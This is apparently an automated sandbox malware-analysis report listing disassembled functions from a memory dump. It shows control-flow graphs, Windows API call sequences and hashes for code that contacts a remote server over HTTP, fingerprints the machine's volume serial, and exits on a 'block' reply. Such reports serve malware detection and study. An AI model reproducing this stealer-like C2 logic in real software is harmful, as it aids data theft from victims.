                                                              • Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AddressProc$LibraryLoad
                                                              • String ID: CloseDesktop$CreateDesktopA$HttpQueryInfoA$InternetSetOptionA$OpenDesktopA
                                                              • API String ID: 2238633743-3468015613
                                                              • Opcode ID: d9010518685dbd8149d20af063d7a7bd964621f9488924b3e0d9ff76a134a9d7
                                                              • Instruction ID: b02b475b7c59bcec4fa92d45c25333ea948ef94e2fcc8a3fd8fff9104c503747
                                                              • Opcode Fuzzy Hash: d9010518685dbd8149d20af063d7a7bd964621f9488924b3e0d9ff76a134a9d7
                                                              • Instruction Fuzzy Hash: 29625EB9A103009FD758DF65ED88AA637BBF789345300A91DF95683364DBB4A800DFB0
                                                              APIs
                                                              • lstrlenA.KERNEL32(0042D01C,00000001,00000000,00000000), ref: 0041F32E
                                                              • lstrcpy.KERNEL32(00000000,0042D01C), ref: 0041F34C
                                                              • lstrlenA.KERNEL32(0042D01C), ref: 0041F357
                                                              • lstrcpy.KERNEL32(00000000,0042D01C), ref: 0041F371
                                                              • lstrlenA.KERNEL32(0042D01C), ref: 0041F37C
                                                              • lstrcpy.KERNEL32(00000000,0042D01C), ref: 0041F396
                                                              • lstrcpy.KERNEL32(00000000,00435564), ref: 0041F3BE
                                                              • lstrcpy.KERNEL32(00000000,0042D01C), ref: 0041F3EC
                                                              • lstrcpy.KERNEL32(00000000,0042D01C), ref: 0041F422
                                                              • lstrcpy.KERNEL32(00000000,0042D01C), ref: 0041F454
                                                              • lstrlenA.KERNEL32(009E4BF0), ref: 0041F476
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 0041F506
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0041F52B
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0041F5E2
                                                              • StrCmpCA.SHLWAPI(?,ERROR), ref: 0041F894
                                                              • lstrlenA.KERNEL32(00A0BBD8), ref: 0041F8C2
                                                              • lstrcpy.KERNEL32(00000000,00A0BBD8), ref: 0041F8EF
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0041F912
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 0041F966
                                                              • lstrcpy.KERNEL32(00000000,00A0BBD8), ref: 0041FA28
                                                              • lstrcpy.KERNEL32(00000000,00A0BAE8), ref: 0041FA58
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 0041FAB7
                                                              • StrCmpCA.SHLWAPI(?,ERROR), ref: 0041FBD5
                                                              • lstrlenA.KERNEL32(00402E3E), ref: 0041FC03
                                                              • lstrcpy.KERNEL32(00000000,00402E3E), ref: 0041FC30
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0041FC53
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 0041FCA7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: lstrcpy$lstrlen
                                                              • String ID: >.@$ERROR
                                                              • API String ID: 367037083-1486603279
                                                              • Opcode ID: 9904dda6127f26a323bbc236357e09c9ee1fe5f73f385f90d1b19d1ae4a564e2
                                                              • Instruction ID: cc5225f4657195739226e2497bd3095dc8a2c9716357749900c22e5d1458564d
                                                              • Opcode Fuzzy Hash: 9904dda6127f26a323bbc236357e09c9ee1fe5f73f385f90d1b19d1ae4a564e2
                                                              • Instruction Fuzzy Hash: 3CA26D70A017028FC720DF25D948A5BBBE5AF44304F18857EE8499B3A1DB79DC86CF99

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1801 4056c0-4056e4 call 402840 1804 4056f5-4056fb call 404ae0 1801->1804 1805 4056e6-4056eb 1801->1805 1808 405700-405760 call 424090 lstrlenA call 424090 1804->1808 1805->1804 1806 4056ed-4056ef lstrcpy 1805->1806 1806->1804 1813 405762-40576a 1808->1813 1814 40576c-40577c call 402840 1808->1814 1813->1813 1813->1814 1817 40578a-405795 1814->1817 1818 40577e-405784 lstrcpy 1814->1818 1819 405797 1817->1819 1820 4057ad-4057bb call 402840 1817->1820 1818->1817 1822 4057a0-4057a8 1819->1822 1825 4057c9-4057d1 1820->1825 1826 4057bd-4057c3 lstrcpy 1820->1826 1822->1822 1823 4057aa 1822->1823 1823->1820 1827 4057d3-4057db 1825->1827 1828 4057dd-4057eb call 402840 1825->1828 1826->1825 1827->1827 1827->1828 1831 4057f9-405804 1828->1831 1832 4057ed-4057f3 lstrcpy 1828->1832 1833 405813-405820 call 402840 1831->1833 1834 405806-40580e 1831->1834 1832->1831 1838 405822-405828 lstrcpy 1833->1838 1839 40582e-405839 1833->1839 1834->1834 1835 405810 1834->1835 1835->1833 1838->1839 1840 40583b 1839->1840 1841 40584d-40585a call 402840 1839->1841 1842 405840-405848 1840->1842 1846 405868-40589a InternetOpenA StrCmpCA 1841->1846 1847 40585c-405862 lstrcpy 1841->1847 1842->1842 1844 40584a 1842->1844 1844->1841 1848 4058a3-4058a5 1846->1848 1849 40589c 1846->1849 1847->1846 1850 405f34-405ff3 InternetCloseHandle call 402930 * 17 1848->1850 1851 4058ab-4058d3 call 423e10 call 402840 1848->1851 1849->1848 1860 4058f3-4058f8 1851->1860 1861 4058d5-4058d7 1851->1861 1864 4058fa call 402930 1860->1864 1865 4058ff-40590c call 402840 1860->1865 1861->1860 1863 4058d9-4058dc 1861->1863 1863->1860 1867 4058de-4058f0 lstrcpy lstrcatA 1863->1867 1864->1865 1873 40591a-405945 call 402930 * 2 lstrlenA call 402840 1865->1873 1874 40590e-405910 1865->1874 1867->1860 1889 405962-405970 call 402840 1873->1889 1890 405947-40594c 1873->1890 1874->1873 1876 405912-405914 lstrcpy 1874->1876 1876->1873 1898 405972-405974 1889->1898 1899 40598f-4059a9 lstrlenA call 402840 1889->1899 1890->1889 1892 40594e-40595c lstrcpy lstrcatA 1890->1892 1892->1889 1898->1899 1901 405976-40597a 1898->1901 1907 4059c3-4059c8 1899->1907 1908 4059ab-4059ad 1899->1908 1901->1899 1904 40597c-405989 lstrcpy lstrcatA 1901->1904 1904->1899 1910 4059ca call 402930 1907->1910 1911 4059cf-4059dc call 402840 1907->1911 1908->1907 1909 4059af-4059bd lstrcpy lstrcatA 1908->1909 1909->1907 1910->1911 1918 4059ea-405a1e call 402930 * 3 lstrlenA call 402840 1911->1918 1919 4059de-4059e0 1911->1919 1938 405a20-405a25 1918->1938 1939 405a3b-405a4d call 402840 1918->1939 1919->1918 1921 4059e2-4059e4 lstrcpy 1919->1921 1921->1918 1938->1939 1940 405a27-405a29 1938->1940 1944 405a6c-405a71 1939->1944 1945 405a4f-405a51 1939->1945 1940->1939 1942 405a2b-405a35 lstrcpy lstrcatA 1940->1942 1942->1939 1947 405a73 call 402930 1944->1947 1948 405a78-405a84 call 402840 1944->1948 1945->1944 1946 405a53-405a57 1945->1946 1946->1944 1949 405a59-405a66 lstrcpy lstrcatA 1946->1949 1947->1948 1953 405a92-405ac9 call 402930 * 2 InternetConnectA 1948->1953 1954 405a86-405a88 1948->1954 1949->1944 1960 405f2e-405f31 1953->1960 1961 405acf-405b05 HttpOpenRequestA 1953->1961 1954->1953 1955 405a8a-405a8c lstrcpy 1954->1955 1955->1953 1960->1850 1962 405f27-405f28 InternetCloseHandle 1961->1962 1963 405b0b-405e64 call 427340 call 4272b0 call 402930 call 4272f0 call 4272b0 call 402930 call 427340 call 4272b0 call 402930 call 427340 call 4272b0 call 402930 call 427340 call 4272b0 call 402930 call 427340 call 4272b0 call 402930 call 4272f0 call 4272b0 call 402930 call 427340 call 4272b0 call 402930 call 427340 call 4272b0 call 402930 call 4272f0 call 4272b0 call 402930 call 427340 call 4272b0 call 402930 call 427340 call 4272b0 call 402930 call 427340 call 4272b0 call 402930 call 427340 call 4272b0 call 402930 call 427340 call 4272b0 call 402930 call 427340 call 4272b0 call 402930 call 427340 call 4272b0 call 402930 call 4272f0 call 4272b0 call 402930 call 427340 call 4272b0 call 402930 call 427340 call 4272b0 call 402930 call 427340 call 4272b0 call 402930 call 427340 call 4272b0 call 402930 lstrlenA * 2 GetProcessHeap HeapAlloc lstrlenA memcpy lstrlenA memcpy lstrlenA * 2 memcpy lstrlenA HttpSendRequestA InternetReadFile 1961->1963 1962->1960 2096 405f1a-405f24 InternetCloseHandle 1963->2096 2097 405e6a 1963->2097 2096->1962 2098 405e70-405e75 2097->2098 2098->2096 2099 405e7b-405ea4 lstrlenA call 402840 2098->2099 2102 405ec2-405ec9 2099->2102 2103 405ea6-405eaa 2099->2103 2105 405ed6-405ee3 call 402840 2102->2105 2106 405ecb-405ed0 call 402930 2102->2106 2103->2102 2104 405eac-405ebc lstrcpy lstrcatA 2103->2104 2104->2102 2111 405ef1-405f14 call 402930 InternetReadFile 2105->2111 2112 405ee5-405ee7 2105->2112 2106->2105 2111->2096 2111->2098 2112->2111 2113 405ee9-405eeb lstrcpy 2112->2113 2113->2111
                                                              APIs
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 004056EF
                                                              • lstrlenA.KERNEL32(?), ref: 00405742
                                                              • lstrcpy.KERNEL32(00000000,0042D01C), ref: 00405784
                                                              • lstrcpy.KERNEL32(00000000,0042D01C), ref: 004057C3
                                                              • lstrcpy.KERNEL32(00000000,0042D01C), ref: 004057F3
                                                              • lstrcpy.KERNEL32(00000000,0042D01C), ref: 00405828
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: lstrcpy$lstrlen
                                                              • String ID: ------$"$--$------$~A
                                                              • API String ID: 367037083-2106860866
                                                              • Opcode ID: 3ae760454baa2433a10e4dfb7c9e6bd38ce3ae5d14960ce0b0a08ccdc03736b0
                                                              • Instruction ID: 212b4b6a8a6c145a7523e110c63bb65051ea1ed7585ae654da97c7ff09dcb277
                                                              • Opcode Fuzzy Hash: 3ae760454baa2433a10e4dfb7c9e6bd38ce3ae5d14960ce0b0a08ccdc03736b0
                                                              • Instruction Fuzzy Hash: 20426A71E006199BCB10EBB5DD89A9F77B5AF04304F44502AF905B72A1DB78ED028FE8

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 2223 418d00-418d24 StrCmpCA 2224 418d26-418d27 ExitProcess 2223->2224 2225 418d2d-418d46 strtok_s 2223->2225 2226 418f42-418f4f call 402930 2225->2226 2227 418d4c-418d51 2225->2227 2229 418d56-418d59 2227->2229 2231 418f23-418f3c strtok_s 2229->2231 2232 418d5f 2229->2232 2231->2226 2246 418d53 2231->2246 2233 418de4-418df2 StrCmpCA 2232->2233 2234 418e04-418e18 StrCmpCA 2232->2234 2235 418d66-418d75 lstrlenA 2232->2235 2236 418ee8-418efa lstrlenA 2232->2236 2237 418ecf-418edd StrCmpCA 2232->2237 2238 418d90-418d9f lstrlenA 2232->2238 2239 418eb6-418ec4 StrCmpCA 2232->2239 2240 418dba-418dc9 lstrlenA 2232->2240 2241 418e1d-418e2b StrCmpCA 2232->2241 2242 418e3d-418e4b StrCmpCA 2232->2242 2243 418e5d-418e6b StrCmpCA 2232->2243 2244 418e7d-418e8b StrCmpCA 2232->2244 2245 418e9d-418eab StrCmpCA 2232->2245 2233->2231 2258 418df8-418dff 2233->2258 2234->2231 2247 418d77-418d7c call 402930 2235->2247 2248 418d7f-418d8b call 402840 2235->2248 2252 418f04-418f10 call 402840 2236->2252 2253 418efc-418f01 call 402930 2236->2253 2237->2231 2251 418edf-418ee6 2237->2251 2254 418da1-418da6 call 402930 2238->2254 2255 418da9-418db5 call 402840 2238->2255 2239->2231 2250 418ec6-418ecd 2239->2250 2256 418dd3-418ddf call 402840 2240->2256 2257 418dcb-418dd0 call 402930 2240->2257 2241->2231 2259 418e31-418e38 2241->2259 2242->2231 2260 418e51-418e58 2242->2260 2243->2231 2261 418e71-418e78 2243->2261 2244->2231 2262 418e91-418e98 2244->2262 2245->2231 2249 418ead-418eb4 2245->2249 2246->2229 2247->2248 2279 418f13-418f15 2248->2279 2249->2231 2250->2231 2251->2231 2252->2279 2253->2252 2254->2255 2255->2279 2256->2279 2257->2256 2258->2231 2259->2231 2260->2231 2261->2231 2262->2231 2279->2231 2280 418f17-418f19 2279->2280 2280->2231 2281 418f1b-418f1d lstrcpy 2280->2281 2281->2231
                                                              APIs
                                                              • StrCmpCA.SHLWAPI(?,block,?,?,?,?,0042081F), ref: 00418D1A
                                                              • ExitProcess.KERNEL32 ref: 00418D27
                                                              • strtok_s.MSVCRT ref: 00418D39
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ExitProcessstrtok_s
                                                              • String ID: block
                                                              • API String ID: 3407564107-2199623458
                                                              • Opcode ID: 2b5693eeba8fd220ac83beb12232b21ebf595c586142cf98576af706eac3d5ba
                                                              • Instruction ID: d61f0b7eaf725463d85374e156b8a22592a45d2bf89fa87c178f2814d4d341aa
                                                              • Opcode Fuzzy Hash: 2b5693eeba8fd220ac83beb12232b21ebf595c586142cf98576af706eac3d5ba
                                                              • Instruction Fuzzy Hash: 675160B1A047019FC7209F75EC88AAB77F6EB48704B10582FE452D7660DBBCD4828F69

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 2282 406b80-406ba4 call 402840 2285 406bb5-406bd7 call 404ae0 2282->2285 2286 406ba6-406bab 2282->2286 2290 406bd9 2285->2290 2291 406bea-406bfa call 402840 2285->2291 2286->2285 2287 406bad-406baf lstrcpy 2286->2287 2287->2285 2292 406be0-406be8 2290->2292 2295 406c08-406c35 InternetOpenA StrCmpCA 2291->2295 2296 406bfc-406c02 lstrcpy 2291->2296 2292->2291 2292->2292 2297 406c37 2295->2297 2298 406c3a-406c3c 2295->2298 2296->2295 2297->2298 2299 406c42-406c62 InternetConnectA 2298->2299 2300 406de8-406dfb call 402840 2298->2300 2301 406de1-406de2 InternetCloseHandle 2299->2301 2302 406c68-406c9d HttpOpenRequestA 2299->2302 2309 406e09-406e20 call 402930 * 2 2300->2309 2310 406dfd-406dff 2300->2310 2301->2300 2304 406ca3-406ca5 2302->2304 2305 406dd4-406dde InternetCloseHandle 2302->2305 2307 406ca7-406cb7 InternetSetOptionA 2304->2307 2308 406cbd-406ced HttpSendRequestA HttpQueryInfoA 2304->2308 2305->2301 2307->2308 2311 406d14-406d24 call 423d30 2308->2311 2312 406cef-406d13 call 427210 call 402930 * 2 2308->2312 2310->2309 2313 406e01-406e03 lstrcpy 2310->2313 2311->2312 2322 406d26-406d28 2311->2322 2313->2309 2324 406dcd-406dce InternetCloseHandle 2322->2324 2325 406d2e-406d47 InternetReadFile 2322->2325 2324->2305 2325->2324 2327 406d4d 2325->2327 2330 406d50-406d55 2327->2330 2330->2324 2331 406d57-406d7d call 427340 2330->2331 2334 406d84-406d91 call 402840 2331->2334 2335 406d7f call 402930 2331->2335 2339 406da1-406dcb call 402930 InternetReadFile 2334->2339 2340 406d93-406d97 2334->2340 2335->2334 2339->2324 2339->2330 2340->2339 2341 406d99-406d9b lstrcpy 2340->2341 2341->2339
                                                              APIs
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 00406BAF
                                                              • lstrcpy.KERNEL32(00000000,0042D01C), ref: 00406C02
                                                              • InternetOpenA.WININET(0042D01C,00000001,00000000,00000000,00000000), ref: 00406C15
                                                              • StrCmpCA.SHLWAPI(?,00A0FE90), ref: 00406C2D
                                                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406C55
                                                              • HttpOpenRequestA.WININET(00000000,GET,?,00A0FBC8,00000000,00000000,-00400100,00000000), ref: 00406C90
                                                              • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406CB7
                                                              • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406CC6
                                                              • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00406CE5
                                                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00406D3F
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 00406D9B
                                                              • InternetReadFile.WININET(?,00000000,000007CF,?), ref: 00406DBD
                                                              • InternetCloseHandle.WININET(00000000), ref: 00406DCE
                                                              • InternetCloseHandle.WININET(?), ref: 00406DD8
                                                              • InternetCloseHandle.WININET(00000000), ref: 00406DE2
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00406E03
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Internet$lstrcpy$CloseHandleHttp$FileOpenReadRequest$ConnectInfoOptionQuerySend
                                                              • String ID: ERROR$GET
                                                              • API String ID: 3687753495-3591763792
                                                              • Opcode ID: d4dda7033de1c3ef4f9815039b5a93dc3c9111a47bd79444559f63d6606b1acc
                                                              • Instruction ID: f53a93b1956779abd9a8e71fe9530673e78fc1538c85e26cedc949aa3c7bae39
                                                              • Opcode Fuzzy Hash: d4dda7033de1c3ef4f9815039b5a93dc3c9111a47bd79444559f63d6606b1acc
                                                              • Instruction Fuzzy Hash: C1818071B00215ABEB20DFA4DC49BAF77B9AF44700F114169F905F72D0DBB8AD058BA8

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 2344 4226e0-422723 GetWindowsDirectoryA 2345 422725 2344->2345 2346 42272c-42278a GetVolumeInformationA 2344->2346 2345->2346 2347 42278c-422792 2346->2347 2348 422794-4227a7 2347->2348 2349 4227a9-4227c0 GetProcessHeap HeapAlloc 2347->2349 2348->2347 2350 4227c2-4227c4 2349->2350 2351 4227c6-4227e4 wsprintfA 2349->2351 2352 4227fb-422812 call 427210 2350->2352 2351->2352
                                                              APIs
                                                              • GetWindowsDirectoryA.KERNEL32(?,00000104,?,00A0BC28), ref: 0042271B
                                                              • GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,0042A470,00000000,00000000,00000000,00000000,?,00A0BC28), ref: 0042274C
                                                              • GetProcessHeap.KERNEL32(00000000,00000104,?,00A0BC28), ref: 004227AF
                                                              • HeapAlloc.KERNEL32(00000000,?,00A0BC28), ref: 004227B6
                                                              • wsprintfA.USER32 ref: 004227DB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Heap$AllocDirectoryInformationProcessVolumeWindowswsprintf
                                                              • String ID: :\$C
                                                              • API String ID: 1325379522-3309953409
                                                              • Opcode ID: 17ae3cac4a1021ad5abd00249c5e84745470b2baf85fda495f1cbf63d3468fe6
                                                              • Instruction ID: 1140a15a3936c49260c842706b5d3ee9313ab901dfb0a5368262f5a6e36a0845
                                                              • Opcode Fuzzy Hash: 17ae3cac4a1021ad5abd00249c5e84745470b2baf85fda495f1cbf63d3468fe6
                                                              • Instruction Fuzzy Hash: D63181B1908219AFCB14CFB89A859EFBFB8FF58740F40016EE505E7250E2748A008BB5

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 2355 405570-4055cf GetProcessHeap RtlAllocateHeap InternetOpenA InternetOpenUrlA 2356 4055d1-4055d2 2355->2356 2357 405627-40563d InternetCloseHandle * 2 2355->2357 2360 4055d8-4055f7 InternetReadFile 2356->2360 2358 4056a7-4056b1 2357->2358 2359 40563f-40564d 2357->2359 2361 405677-40567c 2359->2361 2362 40564f-405652 2359->2362 2363 405623-405626 2360->2363 2364 4055f9 2360->2364 2361->2358 2367 40567e-405681 2361->2367 2362->2361 2366 405654-40565a 2362->2366 2363->2357 2365 405600-40561d KiUserExceptionDispatcher 2364->2365 2365->2365 2368 40561f-405621 2365->2368 2369 405661-405672 2366->2369 2370 40565c 2366->2370 2367->2358 2371 405683-405689 2367->2371 2368->2360 2368->2363 2369->2361 2372 405674 2369->2372 2370->2369 2373 405691-4056a2 2371->2373 2374 40568b 2371->2374 2372->2361 2373->2358 2375 4056a4 2373->2375 2374->2373 2375->2358
                                                              APIs
                                                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00405589
                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 00405590
                                                              • InternetOpenA.WININET(0042D01C,00000000,00000000,00000000,00000000), ref: 004055A6
                                                              • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,04000100,00000000), ref: 004055C1
                                                              • InternetReadFile.WININET(?,?,00000400,00000001), ref: 004055EC
                                                              • KiUserExceptionDispatcher.NTDLL(00000000,?,00000001), ref: 00405611
                                                              • InternetCloseHandle.WININET(?), ref: 0040562B
                                                              • InternetCloseHandle.WININET(00000000), ref: 00405632
                                                              Memory Dump Source
